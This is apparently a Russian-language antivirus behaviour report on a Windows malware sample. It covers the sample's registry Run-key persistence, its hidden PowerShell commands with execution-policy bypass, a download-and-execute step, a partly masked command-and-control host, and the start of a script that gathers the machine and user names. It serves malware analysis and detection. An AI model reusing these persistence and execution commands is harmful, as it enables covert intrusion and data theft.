Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WinHost' = '<SYSTEM32>\cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -Command "$y = (get-itemproperty -path 'HKCU:\' ...
Вредоносные функции
Загружает и запускает на исполнение
- $t1 как %temp + %\ + $t2
Сетевая активность
Подключается к
- 'xp####ct.linkpc.net':9942
UDP
- DNS ASK xp####ct.linkpc.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$y = (get-itemproperty -path 'HKCU:\' -name 'WinHost').WinHost;cmd /c $y"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "$y = (get-itemproperty -path 'HKCU:\' -name 'WinHost').WinHost;cmd /c $y"
- '<SYSTEM32>\cmd.exe' /c "powershell -ExecutionPolicy Bypass -Command "$spl = '\';$vn = 'WPcmd_rg';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_Lo...
